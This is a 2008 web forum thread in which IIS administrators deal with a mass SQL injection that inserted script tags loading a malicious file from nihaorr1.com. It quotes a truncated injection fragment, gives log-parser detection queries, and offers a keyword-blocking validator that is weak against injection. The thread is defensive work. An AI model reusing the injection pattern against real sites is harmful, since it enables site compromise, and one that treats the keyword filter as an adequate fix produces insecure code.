Previous Next

• 04-21-2008, 6:10 PM

  In reply to

  pb_aldea Joined on 04-21-2008, 9:06 PM Posts 3

  Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact On log files I found nothing and form data is not logged anywhere. Lately I've found malformed links from my own site but they're not an issue, it's just the script that ran more than once on the same table and now the content has some strings like <scr<scr<script src=... I'm wondering if the system tables were affected too, this issue with my backup kept me stick to my desk the whole weekend.

• 04-21-2008, 8:08 PM

  In reply to

  Sleuth23 Joined on 04-21-2008, 9:45 PM Posts 4

  Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact maybe someone can answer this.   would be safe to assume that if there is nothing in the iis logs that it was because the inject was formed based? If it was url based, would i see something in the IIS logs?   The sevrer was restored but i cant recommend it go back on line until we identify the attack vector and vulnerability. If it is just a poorly coded form or two, that is an easy fix.   Any help appreciated.

• 04-21-2008, 11:07 PM

  In reply to

  steve schofield Joined on 06-10-2002, 8:54 PM MI Posts 2,550	Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact If it's in a querystring variable, this would be logged into your IISLogs.  SQL injections can happen either in a form post, but normally it is a mal-formed URL.  Steve Schofield Windows Server MVP - IIS http://weblogs.asp.net/steveschofield http://www.IISLogs.com Log archival solution Install, Configure, Forget

• 04-21-2008, 11:56 PM

  In reply to

  Sleuth23 Joined on 04-21-2008, 9:45 PM Posts 4	Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact thanks steve   i have found nothing in the iis logs thus far. I am still looking though.  Anywhere else i should be looking?

• 04-22-2008, 9:22 AM

  In reply to

  lossman Joined on 04-22-2008, 1:20 PM Posts 1	Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact Thanks for all the info. I did set up the Profiler assuming you meant to track Exec: Prepared SQL.  I didn't change any other defaults. Brett

• 04-23-2008, 6:54 PM

  In reply to

  bestis Joined on 04-23-2008, 10:49 PM Posts 1	Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact This is a site that is reached when a user clicks on an attachment (lately Tibetan rights stuff) that downlaods an infected JavaScript file. It is malicious and you really need to block it incoming and outgoing. If you go to http://whois.domaintools.com/nihaorr1.com you'll see that it is hosted in China.

• 04-24-2008, 2:06 PM

  In reply to

  fabrica.cz Joined on 04-24-2008, 5:57 PM Czech rep. Posts 1	Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact That helped me. For the SQL user dissalow permisson for SELECT for tables syscollums and sysobjects.

• 04-24-2008, 5:11 PM

  In reply to

  nhertz Joined on 04-21-2008, 12:14 AM Posts 2

  Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact I would advise anyone affected by this attack to activate the SQL profiler (or equivalent) and set it to record only EXEC commands. If your website then becomes infected again you can quickly scroll through the profiler output and find the "suspicious" command where the injection has entered. This should also give you a hint of the exact page that had the vulnerability. I cleaned up a site this week where the profiler had recorded: SELECT TOP 100 People.Countries, States.Titles, Houses.Types FROM People, States, Houses Where People.Titles LIKE '%agent;DECLARE @S NVARCHAR(4000);SET etc...... So I could quickly locate the page which had the SELECT TOP 100 statement. That is where I added the quick fix: <% some code here.... %>  <!--#include file="validator.asp"--> <% rs.Open sql %>  With the validator file containing: <% if instr(lcase(sql),";--")>0 then response.redirect("index.asp") end if if instr(lcase(sql),"nvarchar")>0 then response.redirect("index.asp") end if %>  Cheers and good luck, Nicolai Hertz software programmer

  Tags: Iframe injectionaspdersql injectionhackingnmidahena attack

• 04-25-2008, 1:22 PM

  In reply to

  xp_cmdshell Joined on 04-25-2008, 5:21 PM Posts 2	Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact You guys need to get a clue...it's called prepared statements.

• 04-25-2008, 3:42 PM

  In reply to

  Rovastar Joined on 03-13-2008, 10:00 AM London, UK Posts 749

  Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact Now the story is on slashdot with links to this thread http://it.slashdot.org/article.pl?sid=08/04/25/1358234  so beware the LAMPs trolls...*waves*...:) and the increased traffic to Steve's server. :) It also links to http://www.f-secure.com/weblog/archives/00001427.html which is a good summary basic what is said in this thread with a few extras. Most overused word in IT is 'should' as in 'That should work!?!'

• 04-25-2008, 3:49 PM

  In reply to

  Rovastar Joined on 03-13-2008, 10:00 AM London, UK Posts 749

  Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact xp_cmdshell: You guys need to get a clue...it's called prepared statements.    Thanks for that but who needs to get a clue? Have you ever been a web hosting admin? I expect not. You might be one of the few devs that can actually code properly hence can fix the problem. Admin don't we just have bad devs that cannot code properly and we try and minimise the damage. What can we do shut down the database? It seems clear that now it is the slack devs fault you are casting blame in the wrong place. Most overused word in IT is 'should' as in 'That should work!?!'

• 04-25-2008, 5:12 PM

  In reply to

  steve schofield Joined on 06-10-2002, 8:54 PM MI Posts 2,550

  Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact Prepared statements generally are stored procedures, at least that is my understanding.  Dynamic SQL type pages can be exposed to sql injection attacks.  Of course if the stored procedure takes input without being validated, it can be also.  But is one layer deeper.  Only good error coding can prevent it.  Steve Schofield Windows Server MVP - IIS http://weblogs.asp.net/steveschofield http://www.IISLogs.com Log archival solution Install, Configure, Forget

• 04-25-2008, 5:45 PM

  In reply to

  jdybka Joined on 04-25-2008, 9:38 PM TN Posts 1	Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact  I use a filter called WebKnight to filter out SQL injection attempts and other crud. You can Google it - it's open source and can give you some .htaccess functionality for IIS. It is blocking these requests from China for us. It's installed as an isapi filter. Jilly

• 04-25-2008, 6:32 PM

  In reply to

  xp_cmdshell Joined on 04-25-2008, 5:21 PM Posts 2

  Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact steve schofield: Prepared statements generally are stored procedures, at least that is my understanding.  Dynamic SQL type pages can be exposed to sql injection attacks.  Of course if the stored procedure takes input without being validated, it can be also.  But is one layer deeper.  Only good error coding can prevent it.      Dim UserSuppliedString as String = Request.QueryString("UserSuppliedString") Dim cmd As new SqlCommand("SELECT * FROM blahblah WHERE id = @au_id") Dim param = new SqlParameter("au_id", SqlDbType.VarChar) param.Value = UserSuppliedString cmd.Parameters.Add(param)

• 04-26-2008, 5:56 AM

  In reply to

  steve schofield Joined on 06-10-2002, 8:54 PM MI Posts 2,550

  Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact Thanks for posting a clarification.  btw. For those who want to use Log parser to detect in your IISLogs if you've been hit, here are a few log parser examples. 'This will find all webpages that had sql injection.  You can change the wording between the %% to look for a different string logparser -i:iisw3c "select date,time,cs-uri-stem,cs-uri-query from <example.com> where cs-uri-query like '%CAST%'" -o:csv 'This will give you the first time your site was hit, if applicable.  logparser -i:iisw3c "select date,time,cs-uri-stem,cs-uri-query from <example.com> where cs-uri-query like '%1.js%'" -o:csv 'Download Log Parser 2.2 http://www.iis.net/downloads/default.aspx?tabid=34&g=6&i=1287 Steve Schofield Windows Server MVP - IIS http://weblogs.asp.net/steveschofield http://www.IISLogs.com Log archival solution Install, Configure, Forget